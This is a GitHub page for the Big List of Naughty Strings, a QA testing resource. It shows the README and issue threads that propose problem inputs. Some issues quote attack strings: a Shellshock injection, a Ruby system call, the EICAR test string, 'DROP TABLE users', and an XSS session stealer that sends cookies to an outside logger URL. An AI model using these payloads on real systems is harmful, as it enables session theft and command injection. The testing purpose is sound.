minimaxir / big-list-of-naughty-strings

The Big List of Naughty Strings is a list of strings which have a high probability of causing issues when used as user-input data.

License: MIT License

Python 49.97% Shell 7.49% Go 38.09% Makefile 4.45%

big-list-of-naughty-strings's Introduction

Big List of Naughty Strings

The Big List of Naughty Strings is an evolving list of strings which have a high probability of causing issues when used as user-input data. This is intended for use in helping both automated and manual QA testing; useful for whenever your QA engineer walks into a bar.

Why Test Naughty Strings?

Even multi-billion dollar companies with huge amounts of automated testing can't find every bad input. For example, look at what happens when you try to Tweet a zero-width space (U+200B) on Twitter:

Although this is not a malicious error, and typical users aren't Tweeting weird unicode, an "internal server error" for unexpected input is never a positive experience for the user, and may in fact be a symptom of deeper string-validation issues. The Big List of Naughty Strings is intended to help reveal such issues.

Usage

blns.txt consists of newline-delimited strings and comments which are preceded with #. The comments divide the strings into sections for easy manual reading and copy/pasting into input forms. For those who want to access the strings programmatically, a blns.json file is provided containing an array with all the comments stripped out (the scripts folder contains a Python script used to generate the blns.json).
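As a minimal sketch of programmatic access, the snippet below parses a blns.txt-style string by hand and loads a blns.json-style array. The function name parse_blns_text and the inline sample data are hypothetical, and the sketch assumes that blank lines are only separators and that no naughty string itself starts with #.

```python
import json


def parse_blns_text(text):
    """Return the non-comment, non-blank lines of a blns.txt-style string."""
    strings = []
    # Split on "\n" only: str.splitlines() would also split on Unicode line
    # separators, which some naughty strings may contain on purpose.
    for line in text.split("\n"):
        # Assumption: blank lines are separators and '#' lines are comments.
        if line == "" or line.startswith("#"):
            continue
        strings.append(line)
    return strings


# Tiny inline sample standing in for the real blns.txt (hypothetical content).
sample = "#\tReserved Strings\n#\n\nundefined\nnull\n\n#\tNumeric Strings\n\n0\n1.00\n"
naughty = parse_blns_text(sample)

# blns.json is described as a plain array, so the standard json module suffices.
from_json = json.loads('["undefined", "null", "0", "1.00"]')

for s in naughty:
    print(repr(s))
```

With the real files, the same function would be fed the contents of blns.txt read as UTF-8, and json.load would be called on an open blns.json.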

Contributions

Feel free to send a pull request to add more strings, or additional sections. However, please do not send pull requests with very-long strings (255+ characters), as that makes the list much more difficult to view.

Likewise, please do not send pull requests which compromise manual usability of the file. This includes the EICAR test string, which can cause the file to be flagged by antivirus scanners, and files which alter the encoding of blns.txt. Also, do not send a null character (U+0000) string, as it changes the file format on GitHub to binary and renders it unreadable in pull requests. Finally, when adding or removing a string please update all files when you perform a pull request.

Disclaimer

The Big List of Naughty Strings is intended to be used for software you own and manage. Some of the Naughty Strings can indicate security vulnerabilities, and as a result using such strings with third-party software may be a crime. The maintainer is not responsible for any negative actions that result from the use of the list.

Additionally, the Big List of Naughty Strings is not a fully-comprehensive substitute for formal security/penetration testing for your service.

Library / Packages

Various implementations of the Big List of Naughty Strings have made it to various package managers. Those are maintained by outside parties, but can be found here:

Library	Link
Node	https://www.npmjs.com/package/blns
Node	https://www.npmjs.com/package/big-list-of-naughty-strings
.NET	https://github.com/SimonCropp/NaughtyStrings
PHP	https://github.com/mattsparks/blns-php
C++	https://github.com/eliabieri/blnscpp

Please open a PR to list others.

Maintainer/Creator

Max Woolf (@minimaxir)

Social Media Discussions

June 10, 2015 [Hacker News]: Show HN: Big List of Naughty Strings for testing user-input data
August 17, 2015 [Reddit]: Big list of naughty strings.
February 9, 2016 [Reddit]: Big List of Naughty Strings
January 15, 2017 [Hacker News]: Naughty Strings: A list of strings likely to cause issues as user-input data
January 16, 2017 [Reddit]: Naughty Strings: A list of strings likely to cause issues as user-input data
November 16, 2018 [Hacker News]: Big List of Naughty Strings
November 16, 2018 [Reddit]: Naughty Strings - A list of strings which have a high probability of causing issues when used as user-input data

License

MIT


big-list-of-naughty-strings's Issues

Question: How to protect yourself properly?

Now that we have a list of potential naughty strings, what do you do with it to protect yourself properly? What's the best way to use this list to protect your backend where user input is required?

I'll be using this list in a nodejs based app with a mongo db, is it "enough" to test if the user input .contains() a line from the list? What would be a better way to protect yourself, rather than just looping over the list and checking for something that's equal (or at least contains in the user input)?

AngularJS curly brackets

Hello.

I assume the double curly brackets used in AngularJS for data binding are worth adding to the list. If not escaped properly, a string like {{ blablabla }} may crash an AngularJS app.

More on AngularJS syntax: https://docs.angularjs.org/guide/introduction

Implement multi-language string-sanitization framework utilizing JSON file?

I am suggesting the creation of a library (JavaScript, Python, Java, C/C++, etc.) for sanitizing strings using the JSON file blns.json.

Separate potentially dangerous strings to a separate file

Reading the discussion about removing the "DROP" statement from BLNS, I thought that it may be a good idea to move potentially dangerous strings (such as the DROP statement, the XML fork bomb, etc.) into a separate file from blns.txt, to make sure that testing can be done with no potential data loss.

This change will be particularly useful for testing in a production environment (I'm sure that some of the users using BLNS test directly in a production environment).

Comma as numeric decimal point denotion

Many languages use the comma , to denote decimals, and the period . to denote thousands separation. https://en.wikipedia.org/wiki/Decimal_mark
Is it worth, in the numeric section, having a variety of these:

Whilst these are perhaps not naughty strings, a coder who is used to comma-denoted decimals may be caught out.

single blank

A single blank and strings with leading/trailing blanks are missing, especially " ". Also "%" and "_" (SQL LIKE wildcards).

Some un-code representation

I like this project, and am likely to pull its strings into a Java project I'm working on; however, that means extracting them and making them compatible with Java. It'd be nice to have a file that's parseable by other languages.

shell shock string

Maybe add the shell shock bash code injection string:

() { :;}; echo vulnerable

There might be a lot of more such strings for many different languages/environments.

Typo in the date of social media discussions

I was working on my report Information Dynamics on the GitHub Network, using this repository as a (sample) popular GitHub repository, and found that the date of its first Hacker News submission is wrong. It should be Aug. 10, 2015.

Ruby Strings: System Should Be system (Lowercase "S")

big-list-of-naughty-strings/blns.txt

Line 572 in 8a11558

System("ls -al /")

http://ruby-doc.org/core-2.4.0/Kernel.html#method-i-system

Smart quotes in HTML

A Not-So-Hypothetical situation:

Your customer walks into a bar.
Your customer orders up some XML. Yum!
The customer isn't satisfied, so they edit the XML by hand. In Microsoft Word.
Suddenly, your customer's XML is filled with smart quotes.

What's a poor parser to do?

<foo val=“bar” />

I'm not sure how much of a problem that this actually is, so feel free to close this if it's a little too far-fetched.

It's one of those things that's technically-not-exactly-wrong, but also almost-definitely-not-right.

Date/Time/DateTime strings

There should be a section that contains Date, Time, and DateTime strings. Just as numbers can be encoded in various ways, so can these.

Is there a tutorial on how to alter blns.txt and then generate the other files? If so, I should be able to file a pull request for them. But just off the top of my head, and keeping it to English (the Scunthorpe Problem section and the comments don't contain other languages), I can think of several additions, some valid and some not:

January 23, 2016
23 JAN 2016
23 JAN 16
23-JAN-2016
23 January 2016
...
Jan. 23, 2016

00:00:00
00:00:00 AM
12:00:00 AM
12:00:00 PM
23:59:59.997
12:00:00
18:48:42
...
7:48 pm

January 23, 2016 12:00 am
23/1/16 14:54
...
20160123T000000

And for things that shouldn't be accepted

February 29, 2017
26:84:94
14:00 pm

The possibilities are endless, but aren't they always? Between the US order of M/D/Y and the European order of D/M/Y, 24 hour time, standardized timestamps, indicating UTC with a Z, would this be a valuable addition to the list?

Package.json

Add package.json so that repository can be added as dependency

Section for Date/Time values

Would a section for Date/Time values be a productive idea? To my knowledge, systems don't parse raw DateTime strings unless you explicitly say if it's a DateTime parser, and DateTime parsers don't take in raw DateTime strings, opting instead to use some sort of Date/Time selector widget on the client and doing the calculation on server.

Provide a list of suggested tests to perform

Even though I had been keeping an eye on this repo, I was surprised at how much I didn't know to test for when a recent post in /r/rust/ linked back to Eevee's "Dark corners of Unicode".

Currently, I think the BLNS suffers from a situation similar to "100% branch coverage gives a false sense of security" because it shares the same "If you're not asserting the right things..." problem.

Here are the things from that blog post (beyond the famous "Turkish I" problem) which I think should be covered in a supplementary "how to use the BLNS" document:

Test anything which involves sorting, case conversion, case-insensitive matching, date-handling, or working with decimals under the Turkish locale. (It's not just the case-correspondence and sorting rules which differ.)
Test your equality-testing and upper/lower-case conversion code against things like ß vs ss, ae vs æ, ... vs …, and the NFC (normal form composed) vs. NFD (normal form decomposed) forms of characters like é which have both a combining-character representation and a precomposed representation for round-trip compatibility with legacy systems.
Test your normalization code against Japanese text, where stripping diacritics can result in significant changes in pronunciation and meaning. (On the order of confusing unvoiced and voiced versions of the same consonant, like "kook" (strange/eccentric/crazy person) and "gook" (a racial slur)).
Test that your code which slices or normalizes strings doesn't split apart flag emoji. (The underlying regional indicator symbol pairs are not declared as combining characters)
Test that your code doesn't break up emoji defined using U+200D ZERO WIDTH JOINER.
If you're not simply relying on a browser for text rendering, make sure that both normal forms of Hangul (the primary Korean writing system) render equivalently and properly.
If you're rendering your own character-cell graphics, make sure double-width characters added in newer versions of the Unicode spec, like 🎁 don't overdraw the character which follows them, get cut off, or throw off the column alignment.
Make sure your system displays characters from recent Unicode specs, given a suitable font. (WeeChat silently ignores emoji because it relies on a "how wide is this character" function which reports 0 for stuff that's too new for the bundled copy of the Unicode database)
Audit whether there's anywhere accepting the Ogham space character would be a "wetware exploit" (something where it's valid... but not what the human expects). For example, this JavaScript produces 42 as its output: alert(2+ 40);
Audit whether you're handling U+2800 BRAILLE PATTERN BLANK (looks like a space in most fonts, but isn't) appropriately.
Make sure everything in your stack handles emoji outside the Basic Multilingual Plane properly. (eg. MySQL's utf8 encoding is limited to three bytes per character, which doesn't cover all of the supplementary character planes, so you have to ALTER TABLE it to utf8mb4)
Make sure your system doesn't assume Apple's specific emoji font. They're unicode characters like anything else.
The unicode directionality characters in the BLNS are for testing to make sure your website is wrapping each piece of user-provided text in <bdi></bdi> (bidirectional isolation) elements so it can't alter the directionality of the rest of the content.
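A few of the checks above can be sketched with Python's standard unicodedata module. This is only an illustration under stated assumptions: the helper names same_text and same_text_ignoring_case are hypothetical, and NFC plus casefold() is one possible comparison policy, not a recommendation from the blog post.

```python
import unicodedata

composed = "\u00e9"      # é as a single precomposed code point (NFC form)
decomposed = "e\u0301"   # e followed by COMBINING ACUTE ACCENT (NFD form)


def same_text(a, b):
    """Compare two strings after normalizing both to NFC."""
    return unicodedata.normalize("NFC", a) == unicodedata.normalize("NFC", b)


def same_text_ignoring_case(a, b):
    """Case-insensitive comparison; casefold() maps ß to ss, unlike lower()."""
    return same_text(a.casefold(), b.casefold())


# A flag emoji is two regional indicator code points, so naive slicing
# by code point can cut it in half.
flag = "\U0001F1E9\U0001F1EA"
half_flag = flag[:1]

# U+2026 HORIZONTAL ELLIPSIS only equals three periods under a
# compatibility normalization such as NFKC.
ellipsis_as_dots = unicodedata.normalize("NFKC", "\u2026")

print(composed == decomposed)                        # raw comparison
print(same_text(composed, decomposed))               # normalized comparison
print(same_text_ignoring_case("Straße", "STRASSE"))  # casefolded comparison
```

None of this covers locale-specific rules such as the Turkish dotted and dotless i, which need locale-aware libraries rather than the built-in string methods.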

EDIT: In hindsight, that list would be much clearer if I formatted it as a table, with each row representing a type of input to test (eg. doesn't break up emoji defined using U+200D ZERO WIDTH JOINER) and each column representing where in your program would be potentially vulnerable (eg. string slicing/replacement/etc.).

'walks into a bar' link broken

The link provided in the README is broken; it seems that the destination site has removed all traces of '.aspx', and is blaming others for having outdated links. :(

Escape Character '\', or '\\' for certain uses.

For the 'Reserved Strings' category: backslashes can be used to wreak havoc wherever strings are interpreted, for example through invalid escape sequences. Overall dangerous.

ZWJ Sequence

I think it may be useful to include a recommended ZWJ sequence, especially one of the longer ones. For example, 👩‍👩‍👧‍👦 is ideally displayed as one 'family' character, but is actually 7 Unicode characters, and may fallback to display 4 characters for applications that don't directly support it. Inspired by: https://stackoverflow.com/questions/43618487/why-is-treated-so-strangely-in-swift-strings
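To make the count concrete, here is a small sketch that builds the family sequence from explicit escapes and measures it in code points, UTF-8 bytes, and UTF-16 code units. The variable names are illustrative only.

```python
ZWJ = "\u200D"  # ZERO WIDTH JOINER

# WOMAN, ZWJ, WOMAN, ZWJ, GIRL, ZWJ, BOY
family = "\U0001F469" + ZWJ + "\U0001F469" + ZWJ + "\U0001F467" + ZWJ + "\U0001F466"

code_points = len(family)                           # Python counts code points
utf8_bytes = len(family.encode("utf-8"))            # storage size in UTF-8
utf16_units = len(family.encode("utf-16-le")) // 2  # what JavaScript's .length reports
members = family.split(ZWJ)                         # the emoji shown on fallback

print(code_points, utf8_bytes, utf16_units, len(members))
```

Code that truncates by code point, byte, or UTF-16 unit can cut this sequence at any of those boundaries, which is why it makes a useful test string.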

The string that crashed OS X

You have the string that crashed iOS, but not the string that crashed OS X, File:///. See http://thenextweb.com/shareables/2013/02/02/typing-these-eight-characters-will-crash-almost-any-application-on-your-mac/

Regular Expression Injection

I didn't notice these in the list, but regular expression injection happens when you do things like use regular expressions for search.
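A minimal sketch of the problem and one common mitigation, using Python's re module. The helper names find_literal and is_valid_pattern are hypothetical; re.escape and re.error are part of the standard library.

```python
import re


def is_valid_pattern(pattern):
    """Return True if the string compiles as a regular expression."""
    try:
        re.compile(pattern)
        return True
    except re.error:
        return False


def find_literal(user_input, text):
    """Search for user input as literal text by escaping regex metacharacters."""
    return re.search(re.escape(user_input), text) is not None


# Unescaped input is treated as a pattern: "." matches any character.
unescaped_hit = re.search("a.c", "abc") is not None

# Escaped input only matches the literal characters.
escaped_hit = find_literal("a.c", "abc")

print(is_valid_pattern("("), unescaped_hit, escaped_hit)
```

Feeding each naughty string through a search feature and checking for unhandled pattern errors is one way to surface this class of bug.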

`<plaintext>`

The <plaintext> tag is really naughty, as it is impossible to close it in any way using just HTML. Example at codepen.

Actually, in most cases even just <plaintext string in HTML context would be enough to break stuff.

Python escape sequences

Sometimes you find python escape characters are accepted (and decoded) where they shouldn't be. E.g. something that only accepts alphanumerics goes on to accept
\60
because unescaped it turns into the character '0' but after validation is passed it gets stored as "\60", thus coming back to bite you when it's read back and not unescaped.
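The mismatch described above can be reproduced in a few lines. This is a sketch of a hypothetical buggy validator, not code from any real system: the function names are made up, and the bug is that validation looks at the unescaped form while storage keeps the raw form.

```python
def unescape(value):
    """Interpret Python-style escape sequences such as the octal \\60."""
    return value.encode("ascii").decode("unicode_escape")


def buggy_is_alphanumeric(value):
    """Hypothetical validator that (wrongly) unescapes before checking."""
    return unescape(value).isalnum()


raw = "\\60"             # backslash, '6', '0' exactly as the user typed it
decoded = unescape(raw)  # octal 60 is the character '0'

accepted = buggy_is_alphanumeric(raw)  # validation sees '0'
stored = raw                           # but the raw text is what gets stored

print(repr(decoded), accepted, stored.isalnum())
```

The stored value contains a backslash even though it passed an alphanumeric-only check, which is the situation that comes back to bite you later.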

suggest more variants of Inf/NaN

I suggest adding the following:

Whether "Infinity" is the stringification, and whether Infinity is the numification,

depends on the C library.

INF

Win32 (Visual C, really) variants of the infinity and nan

(see http://blogs.msdn.com/b/oldnewthing/archive/2013/02/21/10395734.aspx)

Yes, the # really is part of the stringification.

The 1#IND is a type of quiet nan.

1#INF
-1#IND
1#QNAN
1#SNAN
1#IND

Opening console handles on Windows

Passing the values CONIN$ and CONOUT$ to fopen etc. on Windows returns handles to stdin and stdout respectively. Code is probably rarely tested against these values to prevent unwanted access. See:

https://msdn.microsoft.com/en-us/library/windows/desktop/ms682075%28v=vs.85%29.aspx

How to use this list in Selenium

Please provide a basic usage guide on how to feed this list to Selenium and verify the results. Thank you.

New found string that will crash currently released versions of Chrome Browser

The following string without the space has been found to crash currently released Chrome Browsers
http: //a/%%30%30

EICAR test file

https://en.wikipedia.org/wiki/EICAR_test_file

standard string that is interpreted as virus by anti-virus software:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Normal arabic strings should be removed from the naughty list

The two strings below should be removed from the list; they are normal Arabic strings that are used frequently. There is no risk with them:

"﷽",
"ﷺ",

You can check below the Arabic Unicode scripts:
https://en.wikipedia.org/wiki/Arabic_script_in_Unicode

JSON cannot represent some naughty strings

One of my favourite naughty strings is invalid utf-8 - for example, a bare \xff.
It's quite common to get 500s, etc. on these, as no one ever bothers to check for Unicode decoding errors.
However, because JSON requires all strings to be valid utf-8, this example is only able to be included in the txt file.

Would this be something worth including and adding a special case in the script to omit from the json?
Or is it too naughty for blns?

EDIT: This HN comment (https://news.ycombinator.com/item?id=10035738) suggested having the JSON file be of b64 encoded strings. This is a good suggestion, and allows arbitrary naughty bytes to be used, at the cost of readability.
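A rough sketch of the base64 idea, assuming a hypothetical JSON layout in which every entry is a base64 string; this is not the format of the actual blns.json or of the base64 file the project ships.

```python
import base64
import json

# Byte strings to ship; the first one is not valid UTF-8 on its own.
naughty_bytes = [b"\xff", b"undefined", "田中".encode("utf-8")]

# Encode each entry as base64 text so the JSON document stays valid.
encoded_json = json.dumps(
    [base64.b64encode(item).decode("ascii") for item in naughty_bytes]
)

# Consumers reverse the process to get the original bytes back.
round_tripped = [base64.b64decode(item) for item in json.loads(encoded_json)]


def is_valid_utf8(data):
    """Return True if the bytes decode cleanly as UTF-8."""
    try:
        data.decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False


print(encoded_json)
print([is_valid_utf8(item) for item in round_tripped])
```

The cost mentioned in the comment is visible here: the encoded file no longer shows the strings in readable form.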

where to put multiline strings?

this attack on webct has two different forms, one of them is a multiline string:

<div id="mycode" style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="// balupton's javascript session stealer automatic hack
	var iframe = document.createElement('iframe');
	iframe.style.border = 'none';
	iframe.style.height = '1px';
	iframe.style.width = '1px';
	var url =
		'http'+'://www.balupton.com/sandbox/logger.php'
		+'?variable=document.cookie'
		+'&value='+escape(document.cookie)
		+'&url='+escape(document.location)
		+'&pass_code=secret_key'
		;
	iframe.src = url;
	document.body.appendChild(iframe);">Thank you</div>

With the newline break of the javascript word being part of it. Here is the simplified version:

<div style="BACKGROUND: url('java
script:alert(123)')">Thank you</div>

However it seems blns.txt won't support it.

Created a NodeJS Module for naughty string checking

I really liked this project, so I created a Node.js module for checking naughty strings 😄
You can see the module here: https://gautamkrishnar.github.io/naughtychecker.js

Any suggestions?

PS: You can close this issue. I created it just to inform you...

Mine

Everything

Newline characters in base64

All base64 strings¹ end with a newline character, eg.:

>>> import base64
>>> base64.b64decode("dW5kZWZpbmVkCg==")
b'undefined\n'
>>> base64.b64decode("dW5kZWYK")
b'undef\n'
>>> base64.b64decode("Q09NMQo=")
b'COM1\n'

Is this on purpose? That newline character seems pretty useless.
If not, that line should probably read echo -n.

1: all but the empty string itself, which makes it even more annoying because it makes two cases to handle.
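For comparison, this sketch encodes the same text with and without the trailing newline, which mirrors the difference between piping echo and echo -n into base64. It assumes the generator script produced its output that way, as the issue suggests.

```python
import base64

# Equivalent to: echo "undefined" | base64
with_newline = base64.b64encode(b"undefined\n").decode("ascii")

# Equivalent to: echo -n "undefined" | base64
without_newline = base64.b64encode(b"undefined").decode("ascii")

print(with_newline)
print(without_newline)
```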

Japanese kana are 3 bytes, kanji are at least 3 bytes.

The .txt file comments say they are 2-byte characters. A quick check with C's strlen would also indicate that Korean hangul are 3 bytes each.

Two-Byte Characters

Strings which contain two-byte characters: can cause rendering issues or character-length issues

田中さんにあげて下さい
...
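The byte counts depend on the encoding, which a short sketch can show. It measures the quoted string in UTF-8 (what strlen sees on a UTF-8 file) and in UTF-16, where these particular characters do take two bytes each. The variable names are illustrative.

```python
text = "田中さんにあげて下さい"
hangul = "한"

characters = len(text)
utf8_total = len(text.encode("utf-8"))
utf16_total = len(text.encode("utf-16-le"))

# Per-character widths in each encoding.
utf8_widths = {len(ch.encode("utf-8")) for ch in text}
utf16_widths = {len(ch.encode("utf-16-le")) for ch in text}
hangul_utf8 = len(hangul.encode("utf-8"))

print(characters, utf8_total, utf16_total, hangul_utf8)
```

So the "two-byte" label holds for UTF-16 but not for UTF-8, where every character in this string takes three bytes.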

new string: ssh escape sequence

The sequence \n~. will cause default-configured ssh sessions to terminate when passed as input.
I realise it's horrifying but I have in fact seen this crop up in the wild where user data was transferred between machines via tar c ... | ssh other tar x (for anyone who finds this from google, the correct fix (besides "don't do that") is ssh -e none)

blns.txt in Pull Requests unexpectedly being changed to binary format w/ no diff

I have no idea why this keeps happening.

I can't auto accept any files that show this because it might corrupt readability on the web. I can try to merge the PRs; worst case, I'll add the strings manually to my own copy and close the PRs.

node module

I just made a convenience module and would like to add you as a maintainer on npm. If you could provide your npm ID, that would be useful.

to add:

found on twitter [ https://twitter.com/irongeek_adc ]: Nͣͥͬͩͣ̂̂̂̂̂̂̂̂̂̂̂̂̂̂

Date/Time Strings

Making a note to add date/time strings which can trip up naive date/time parsers:

non-US date/time formats (e.g. 2017.01.16)
Illegal dates/times (e.g. 2017-01-32 26:00)
Leap Day on non-leap year (e.g. 2017-02-29)
Timezones/illegal timezones

Reference: Wikipedia, xkcd
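As an illustration of how a strict parser treats these categories, the sketch below wraps datetime.strptime from the Python standard library. The helper name parse_strict and the chosen format strings are assumptions for the example.

```python
from datetime import datetime


def parse_strict(value, fmt="%Y-%m-%d"):
    """Return a datetime if value matches fmt exactly, otherwise None."""
    try:
        return datetime.strptime(value, fmt)
    except ValueError:
        return None


leap_day_ok = parse_strict("2016-02-29")                        # real leap day
leap_day_bad = parse_strict("2017-02-29")                       # 2017 is not a leap year
dotted = parse_strict("2017.01.16")                             # separators do not match
illegal = parse_strict("2017-01-32 26:00", "%Y-%m-%d %H:%M")    # day 32, hour 26

print(leap_day_ok, leap_day_bad, dotted, illegal)
```

A naive parser that splits on separators and trusts the numbers would accept several of these, which is the kind of bug the proposed section aims to reveal.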

add constructor and proto

Since JavaScript has become so popular, it's not uncommon for developers to use plain object initializers in the language (i.e. var hash = {}).

Asking objects whether key is in the hash is often done via

var hash = {}
function contains(key) {
  return key in hash
}

This gives false positives for the words constructor and __proto__, which is a source of bugs that are hard to find. Maybe by adding these two words to your list, more people will test their code against this bug :).

Replace "DROP TABLE users" with something more sane

"DROP TABLE users" should be replaced to avoid potential data loss.

Urgent, need bugfix for human injection.

If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.

World view changed. How can I contact outside world? How do I wake up from coma?

Not actually NPM module

@minimaxir I saw that there is a package.json, but there isn't actually a NPM package attached to it. Would you mind publishing it to NPM?

Remove trailing spaces from blns.json

I'd like to test that a round-trip for my JSON library does not produce any deviation. I have a pretty printer where I can adjust the indentation. The problem I have when comparing the result of the round-trip with the original blns.json is the trailing spaces at the end of (almost) each line. I don't think they serve any purpose, and it would make things easier for me, and hopefully others as well, if they could be removed.

UTF-8 byte order marker mid-file

I apologize if this doesn't count, but one of my favorite/least favorite bugs is having a random UTF-8 byte order marker (BOM) mid-file. This is often caused by naively concatenating files together.
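A short sketch of how this arises and how it can be detected. Two in-memory byte strings stand in for files that each start with a BOM; the helper name stray_bom_offsets is hypothetical.

```python
import codecs

BOM = "\ufeff"  # U+FEFF, encoded in UTF-8 as the bytes EF BB BF

# Two "files", each saved with a leading UTF-8 BOM.
part_a = codecs.BOM_UTF8 + "hello\n".encode("utf-8")
part_b = codecs.BOM_UTF8 + "world\n".encode("utf-8")

# Naive concatenation, then decoding with utf-8-sig, which strips only
# a BOM at the very start of the data.
joined = (part_a + part_b).decode("utf-8-sig")


def stray_bom_offsets(text):
    """Return the positions of any U+FEFF that is not at index 0."""
    return [i for i, ch in enumerate(text) if ch == BOM and i > 0]


print(repr(joined))
print(stray_bom_offsets(joined))
```

The leftover U+FEFF is invisible in most editors, so text that looks identical on screen can still fail equality checks or break parsers.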

Easter egg?

While looking at the .txt file I found this one:

Human injection

Strings which may cause human to reinterpret worldview

If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.

Although I found it humorous, I don't think it's testing any actual bug, so maybe you should consider removing it. Or maybe just leave it as an easter egg; I just wanted to point it out to you.

Billion laughs xml "bomb"

Example here: https://en.wikipedia.org/wiki/Billion_laughs

Go package

Is the owner open to adding a .go file to make this repo importable as a Golang package? I can do a PR if so.

Strings out of scope

Looks like we're getting an ever-growing list of strings which are carefully crafted injections.
I believe this is entirely outside of the scope of this project.

Lines 195 to 434, for example, are complex strings which are designed to work in specific scenarios and would be used for fuzzing inputs. We should leave those kinds of strings to https://github.com/fuzzdb-project/fuzzdb and keep doing what the purpose of this project was to begin with.

If we were to merge everything from fuzzdb into the blns, it would become a mass of crap.
Yet we appear to be maintaining an incomplete collection of various fuzzing strings, most of which sit between lines 195 and 434.

Let me know what you all think about this proposition.

Integrate fuzzdb

https://code.google.com/p/fuzzdb/

I'm not sure if it makes sense to effectively fork the project though.